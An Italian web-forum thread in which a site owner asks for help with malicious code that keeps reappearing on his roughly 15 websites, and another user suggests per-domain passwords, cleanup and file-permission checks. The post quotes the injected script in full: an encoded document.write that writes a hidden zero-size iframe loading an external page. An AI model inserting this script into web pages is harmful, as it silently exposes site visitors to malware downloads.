codice maligno nelle mie pagine web...help me!

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

Salve a tutti, sono un nuovo iscritto....ho un grosso problema spero che Voi possiate aiutarmi.
Non sono un grosso esperto ma come seconda attività creo e gestisco alcuni siti web (circa 15) e ultimamente in tutti i miei siti si è inserito un codice "maligno" che vi riporto:

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));

tale codice, credo, provvede ad aprire un altro indirizzo effettuando un download di qualke file exe o rabba simile, sta di fatto che i miei antivirus lo rivelano!
nonstante io provveda a rimuoverlo da tutte le pagine html , per magia, dopo un po', ricomapare....
Ho provato anche a cambiare le psw ftp del mio host .....ma niente!
l'unica soluzione adesso da me adottata è stata la completa rimozione di tutti i file presenti nel mio spazio con conseguente frustrante disservizio per i miei cliente!
Anche la pagina semplice "sito in manutenzione" dopo un po' viene infettata!
P.s. ho anche formattato il mio pc e analizzato per bene tutte le mie pagine html.
Spero che qualcuno possa aiutarmi! Saluti Antonello

gizasmc · Inviato: Sab Ott 27, 2007 2:12 pm Oggetto:

è uno script criptato che appunto ti apre un altro indirizzo, se il tipo ha avuto accesso a tutti 15 i tuoi siti o ti conosce bene oppure hai la stessa pass per tutti i siti.
_________________

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

gizasmc · Inviato: Sab Ott 27, 2007 3:21 pm Oggetto:

a chi ti appoggi come hosting? forse il problema è su quei server, hai parlato del problema a loro?
_________________

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

ho parlato del problema con loro! anzi sono andato direttamente nei loro uffici, tra l'altro i tecnici sono anche dei miei amici ed tale problema è stato riscontrato solo all'interno del mio HOst! tutti gli altri migliaia di domini presenti suil loro server non hanno subito alcun danno! io credo sia un virus che invio io via ftp!

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web!

gizasmc · Inviato: Lun Ott 29, 2007 2:29 pm Oggetto:

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

gizasmc · Inviato: Lun Ott 29, 2007 3:04 pm Oggetto:

secondo me è una cosa logica dare una pass diversa ad ogni dominio, se lo facevi prima forse non passavi tutto questo.
non so io proverei a svuotare i domini cambiare pass e prima di reinserire i siti ricontrollare le pagine per eliminare i codici che non conosci e sai di non aver inserito tu.
_________________

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

gizasmc · Inviato: Lun Ott 29, 2007 3:53 pm Oggetto:

dipende da che linguaggio usi per fare i siti
_________________

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

cuba74 · Nuovo del Forum Registrato: Oct 27, 2007 Messaggi: 9

gizasmc · Inviato: Lun Ott 29, 2007 5:33 pm Oggetto:

di base una cosa pratica è aprire il tuo client ftp accedere al sito selezionare il file e col tasto destro andare su proprietà/CHMOD, da li controlli i permessi di scrittura.
_________________

gizasmc · Inviato: Lun Ott 29, 2007 5:37 pm Oggetto:

mai avuto problemi con quel tipo di contatore anche se non mi piace più usarlo. cmq è vero che alcuni "gadget" presi da servizi online possono creare questi problemi.
_________________